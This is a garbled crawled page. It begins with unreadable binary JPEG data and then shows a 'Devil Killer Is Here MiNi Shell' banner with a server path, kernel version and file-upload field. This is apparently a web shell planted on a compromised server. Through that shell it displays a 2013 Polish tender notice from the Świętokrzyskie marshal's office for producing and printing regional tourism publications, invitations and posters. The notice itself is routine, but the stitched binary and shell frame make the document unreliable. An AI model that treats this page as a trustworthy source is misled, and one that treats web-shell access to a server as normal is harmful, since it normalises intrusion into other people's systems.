JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20130226/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20130226/30177-N-2013.html

<p class="kh_header"><b>Kielce: OPRACOWANIE MERYTORYCZNE, GRAFICZNE, SKŁAD, DRUK I DOSTAWA WYDAWNICTW PROMUJĄCYCH WALORY TURYSTYCZNE WOJEWÓDZTWA ŚWIĘTOKRZYSKIEGO ORAZ ZAPROSZEŃ I PLAKATÓW NA IMPREZY ORGANIZOWANE PRZEZ SAMORZĄD WOJEWÓDZTWA ŚWIĘTOKRZYSKIEGO</b><br>
<b>Numer ogłoszenia: 30177 - 2013; data zamieszczenia: 26.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo Świętokrzyskie - Urząd Marszałkowski Województwa Świętokrzyskiego , al. IX Wieków Kielc 3, 25-516 Kielce, woj. świętokrzyskie, tel. 41 3421901, 3421677, 3421576, faks 41 3445265, 3445723.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sejmik.kielce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OPRACOWANIE MERYTORYCZNE, GRAFICZNE, SKŁAD, DRUK I DOSTAWA WYDAWNICTW PROMUJĄCYCH WALORY TURYSTYCZNE WOJEWÓDZTWA ŚWIĘTOKRZYSKIEGO ORAZ ZAPROSZEŃ I PLAKATÓW NA IMPREZY ORGANIZOWANE PRZEZ SAMORZĄD WOJEWÓDZTWA ŚWIĘTOKRZYSKIEGO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest usługa opracowania merytorycznego, graficznego, składu, korekty, naświetlania i druku wydawnictw promujących walory turystyczne województwa świętokrzyskiego oraz zaproszeń i plakatów na imprezy organizowane przez Samorząd Województwa Świętokrzyskiego wraz z ich dostarczeniem do siedziby Zamawiającego w Kielcach przy ul. Paderewskiego 34 A, 25 - 502 Kielce, oraz rozładunkiem przez Wykonawcę w miejscach wskazanych przez Zamawiającego, wg wyszczególnienia: 
I CZĘŚĆ ZAMÓWIENIA
A.	Informator turystyczny Województwa Świętokrzyskiego - w nakładzie 2 000 egzemplarzy (1 500 - wersja polska, 500 - wersja niemiecka); 
B.	Przewodnik Świętokrzyskie na weekend -  w nakładzie 2 000 egzemplarzy.
II CZĘŚĆ ZAMÓWIENIA
A.	Informator agroturystyczny województwa świętokrzyskiego - w nakładzie 3 000 egzemplarzy;
B.	Perły ziemi świętokrzyskiej - przewodnik mini w wersji polsko-angielsko-niemiecko-francuskiej - w nakładzie 3 000 egzemplarzy.
III CZĘŚĆ ZAMÓWIENIA
Mapa Szlaku Frontu Wschodniego I Wojny Światowej (wersja polsko-angielsko-niemiecka) - w nakładzie 2 000 egzemplarzy.
IV CZĘŚĆ ZAMÓWIENIA
A.	Świętokrzyski paszport turystyczny - w nakładzie 15 000 egzemplarzy;
B.	Zaproszenia:
-	Inauguracja sezonu turystycznego - w nakładzie 300 sztuk;
-	Światowy Dzień Turystyki - Obchody Wojewódzkie - w nakładzie 300 sztuk;
-	Świętokrzyski Jarmark Agroturystyczny - 500 sztuk;
C.	 Plakaty - Świętokrzyski Jarmark Agroturystyczny w nakładzie:
-	Format A2 - 200 sztuk,
-	Format B1 - 100 sztuk..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy, o wartości do 50 % wartości zamówienia podstawowego w odpowiedniej części</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.82.25.00-7, 79.81.00.00-5, 79.82.20.00-2, 79.82.30.00-9, 79.96.00.00-1, 79.82.11.00-6, 79.97.12.00-3, 79.92.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający żąda wniesienia przez Wykonawców wadium, którego wysokość ustalona została na kwotę:
-	 I część zamówienia: 1 200,00 złotych (słownie złotych: tysiąc dwieście 00/100)
-	 II część zamówienia: 1 500,00 złotych (słownie złotych: tysiąc pięćset 00/100)
-	 III część zamówienia: 250,00 złotych (słownie złotych: dwieście pięćdziesiąt 00/100)
-	 IV część zamówienia: 500,00 złotych (słownie złotych: pięćset 00/100) 
2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
3.	Wadium musi być wniesione przez Wykonawców przed upływem terminu wyznaczonego do składania ofert. 
4.	W przypadku wnoszenia wadium w formie pieniądza liczy się termin wpływu środków na konto Zamawiającego (moment uznania konta Zamawiającego).
5.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego wg danych: 
a)	Nazwa banku i nr konta zamawiającego: 
		     Getin Noble Bank, 	45 1560 0013 2536 2450 5776 0005
b)	Nazwa i adres zamawiającego:
Województwo Świętokrzyskie - Urząd Marszałkowski Województwa Świętokrzyskiego,  al. IX Wieków Kielc 3, 25-516 Kielce
c)	Tytuł wpłaty: 
Wadium - przetarg nieograniczony na usługę opracowania merytorycznego, graficznego, składu, druku i dostawy wydawnictw promujących walory turystyczne województwa świętokrzyskiego oraz zaproszeń i plakatów na imprezy organizowane przez Samorząd Województwa Świętokrzyskiego - część: -- zamówienia</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22
ust. 1 ustawy, tj. a) posiadają odpowiednią wiedzę i doświadczenie niezbędne do wykonania zamówienia, i w powyższym zakresie wykażą, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie co najmniej:
- dla I części zamówienia - min. dwie usługi opracowania, składu i druku wydawnictw/publikacji o wartości brutto nie mniejszej niż 40 000,00 złotych każda, 
-	dla II części zamówienia - min. dwie usługi opracowania, składu i druku wydawnictw/publikacji o wartości brutto nie mniejszej niż 50 000,00 złotych każda, 
-	dla III części zamówienia - min. dwie usługi opracowania, składu i druku wydawnictw/publikacji o wartości brutto nie mniejszej niż 9 000,00 złotych każda. 
-	dla IV części zamówienia - min. dwie usługi opracowania, składu i druku wydawnictw/publikacji o wartości brutto nie mniejszej niż 18 000,00 złotych każda.
UWAGA 
W przypadku składania oferty na więcej niż jedną część zamówienia Wykonawcy mogą posiadać wiedzę i doświadczenie przy wykonaniu min. dwóch usług opracowania, składu i druku wydawnictw/publikacji o wartości stanowiącej sumę kwot określonych dla wybranych części lub odrębnie po min. dwie usługi o wymaganych wartościach dla wybranych części zamówienia.
Ocena w/w warunku udziału w
postępowaniu będzie dokonywana według zasady spełnia/nie spełnia, na podstawie Oświadczenia z art.
22 ust 1 ustawy Prawo zamówień publicznych i dokumentów załączonych do oferty, które zostały
wyszczególnione w pkt. III.6 lit A oraz rozdziale VI. lit. A SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują odpowiednim potencjałem
technicznym. Ocena w/w warunków udziału w postępowaniu będzie dokonana według zasady
spełnia/nie spełnia, na podstawie Oświadczenia z art. 22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują osobami zdolnymi do
wykonania zamówienia. Zamawiający oceni spełnienie tego warunku według zasady spełnia/nie spełnia,
na podstawie Oświadczenia z art. 22 ust. 1 ustawy Prawo zamówień publicznych załączonego do oferty</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy znajdują się w sytuacji ekonomicznej i
finansowej zapewniającej wykonanie zamówienia. Ocena w/w warunku udziału w postępowaniu będzie
dokonana według zasady spełnia/nie spełnia, na podstawie Oświadczenia z art. 22 ust. 1 ustawy Prawo
zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy przystępujący do postępowania zobowiązani są do złożenia ofert, składających się z następujących dokumentów:
A.	Wykaz dokumentów potwierdzających spełnianie warunków udziału 
w postępowaniu wskazanych w rozdziale V pkt. 1 SIWZ:
1.	Oświadczenie o spełnianiu warunków udziału w postępowaniu, (art. 22 ust. 1 ustawy) - wg wzoru określonego w Dodatku nr 3A do SIWZ - oryginał;
2.	Wykaz głównych usług wykonanych w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane - według wzoru stanowiącego dodatek nr 3B do SIWZ, oraz załączeniem dowodów czy zostały wykonane należycie - oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę;
UWAGA
Zgodnie z §1 ust. 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r., w sprawie rodzaju dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane, dowodami, o których mowa w pkt. 2 są: poświadczenia albo oświadczenia wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczeń.  
Zgodnie z § 9 ust. 1 w/w rozporządzenia,  Wykonawca w miejsce poświadczeń, o których mowa powyżej, może przedkładać dokumenty potwierdzające należyte wykonanie  usług, określone w § 1 ust. 1 pkt 3 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. (Dz. U. Nr 226, poz. 1817).
3.	Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy - wg wzoru określonego w dodatku nr 3C do SIWZ - oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę;
4.	Aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia na podstawie art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę.  
5.	W przypadku gdy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 4 składa dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę. Dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę). 
6.	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt 5, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - oryginał lub kopia poświadczona za zgodność z oryginałem przez Wykonawcę. Dokumenty powinny być wystawione 
z zachowaniem wymaganych terminów, odpowiednio wg zasad określonych dla dokumentów wymienionych w pkt 5 niniejszego rozdziału.
7.	Listę podmiotów należących do tej samej grupy kapitałowej co wykonawca albo informację o tym, że Wykonawca nie należy do grupy kapitałowej(oryginał) - według wzoru stanowiącego Dodatek nr 3D do SIWZ. 
8.	W przypadku wspólnego ubiegania się o udzielenie zamówienia Wykonawców występujących wspólnie (w tym spółki cywilne) każdy Wykonawca oddzielnie składa dokumenty wskazane w pkt 3, 4, 7 (oświadczenie z art. 24 ust. 1, dokumenty potwierdzające brak podstaw do wykluczenia z postępowania - oryginały lub kopie potwierdzone za zgodność z oryginałem przez Wykonawcę, listę podmiotów w przypadku przynależności do grupy kapitałowej lub informację o braku takiej przynależności). Dokumenty, o których mowa w pkt. 1 i 2 (oświadczenie z art. 22 ust. 1 - oryginał, oraz dokumenty potwierdzające spełnianie warunków udziału w postępowaniu - oryginały lub kopie potwierdzone za zgodność z oryginałem przez Wykonawcę) Wykonawcy składają wspólnie.
9.	Zamawiający wymaga, aby załączone do oferty dokumenty, sporządzone w języku obcym złożone zostały wraz z tłumaczeniem na język polski.
B.	Wykaz pozostałych dokumentów i dodatkowe informacje
1.	Wypełniony Formularz oferty - wg wzoru określonego w Dodatku nr 1 do SIWZ. 
2.	Wypełniony Formularz cenowy dotyczący części zamówienia, na którą składana jest oferta - wg wzoru określonego w Dodatku nr 2A, 2B, 2C i/lub 2D do SIWZ, który stanowić będzie odpowiedni załącznik do oferty Wykonawcy. 
3.	Wykonawca, który będzie polegać na wiedzy i doświadczeniu innych podmiotów (art. 26 ust. 2b) zobowiązany jest udowodnić Zamawiającemu iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązania tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia -oryginał podpisany przez podmiot. 
4.	W przypadku wspólnego ubiegania się o udzielenie zamówienia Wykonawców występujących wspólnie (dotyczy również spółki cywilnej) - pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (oryginał lub poświadczona notarialnie kopia). 
5.	Pełnomocnictwo określające jego zakres - w przypadku gdy Wykonawcę reprezentuje pełnomocnik (oryginał lub poświadczona notarialnie kopia). 
6.	W przypadku wnoszenia wadium w formie niepieniężnej (rozdział VIII, pkt 2 lit. b - e SIWZ) - oryginał dokumentu potwierdzającego wniesienie przez Wykonawcę wadium, w wymaganej wysokości dla odpowiedniej części zamówienia. Oryginał dokumentu może zostać dołączony do oferty lub może zostać złożony w siedzibie Zamawiającego, pok. 146, w oddzielnej kopercie, opisanej zgodnie z instrukcją zawartą w rozdziale X pkt 2 niniejszej SIWZ z dopiskiem WADIUM przed upływem terminu wyznaczonego do składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian postanowień zawartych w Umowie dotyczących terminu wykonania Umowy, w przypadku działania siły wyższej, powodującej konieczność wprowadzenia zmian do Umowy. Przez działanie siły wyższej należy rozumieć zdarzenie bądź połączenie zdarzeń obiektywnie niezależnych od stron Umowy, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z Umowy, których strony Umowy nie mogły przewidzieć 
i którym nie mogły zapobiec, ani ich przezwyciężyć i im przeciwdziałać poprzez działanie 
z należytą starannością. Wykonawca jest zobowiązany niezwłocznie poinformować Zamawiającego o fakcie zaistnienia siły wyższej oraz wskazać zakres i wpływ, jakie zdarzenie miało na przebieg realizacji Przedmiotu Umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.sejmik.kielce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski
Województwa Świętokrzyskiego w Kielcach al. IX Wieków Kielc 3, 25-516 Kielce, Budynek C-2, pokój 345, III
piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.03.2013 godzina 12:00, miejsce: Urząd Marszałkowski Województwa Świętokrzyskiego w Kielcach al. IX Wieków Kielc 3,
25-516 Kielce, Budynek C-2, pokój 149 (Kancelaria Ogólna, I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szczegółowe informacje dotyczące terminów wykonania zadań z poszczególnych części zamówienia: I CZĘŚĆ ZAMÓWIENIA
A.	Informator turystyczny Województwa Świętokrzyskiego - do 31 października 2013 r.
B.	Przewodnik Świętokrzyskie na weekend -  do 30 kwietnia 2013 r.

II CZĘŚĆ ZAMÓWIENIA
A.	Informator agroturystyczny województwa świętokrzyskiego - do 30 listopada 2013 r.
B.	Perły ziemi świętokrzyskiej - przewodnik mini w wersji polsko-angielsko-niemiecko-francuskiej - do 30 sierpnia 2013 r.
III CZĘŚĆ ZAMÓWIENIA
Mapa Szlaku Frontu Wschodniego I Wojny Światowej (wersja polsko-angielsko-niemiecka) - do 31 października 2013 r.
IV CZĘŚĆ ZAMÓWIENIA
A.	Świętokrzyski paszport turystyczny - do 24 maja 2013 r.
B.	Zaproszenia:
-	Inauguracja sezonu turystycznego - do 29 marca 2013 r.
-	Światowy Dzień Turystyki - Obchody Wojewódzkie - do 14 września 2013 r.
-	Świętokrzyski Jarmark Agroturystyczny - do 17 maja 2013 r.
C.	 Plakaty - Świętokrzyski Jarmark Agroturystyczny - do 17 maja 2013 r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem zamówienia jest usługa opracowania merytorycznego, graficznego, składu, korekty, naświetlania i druku wydawnictw promujących walory turystyczne województwa świętokrzyskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa opracowania merytorycznego, graficznego, składu, korekty, naświetlania i druku wydawnictw promujących walory turystyczne województwa świętokrzyskiego wraz z ich dostarczeniem do siedziby Zamawiającego w Kielcach przy ul. Paderewskiego 34 A, 25 - 502 Kielce, oraz rozładunkiem przez Wykonawcę w miejscach wskazanych przez Zamawiającego, wg wyszczególnienia: A.	Informator turystyczny Województwa Świętokrzyskiego - w nakładzie 2 000 egzemplarzy (1 500 - wersja polska, 500 - wersja niemiecka); 
B.	Przewodnik Świętokrzyskie na weekend -  w nakładzie 2 000 egzemplarzy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.25.00-7, 79.81.00.00-5, 79.82.20.00-2, 79.82.30.00-9, 79.96.00.00-1, 79.82.11.00-6, 79.97.12.00-3, 79.92.00.00-9.</p></li>
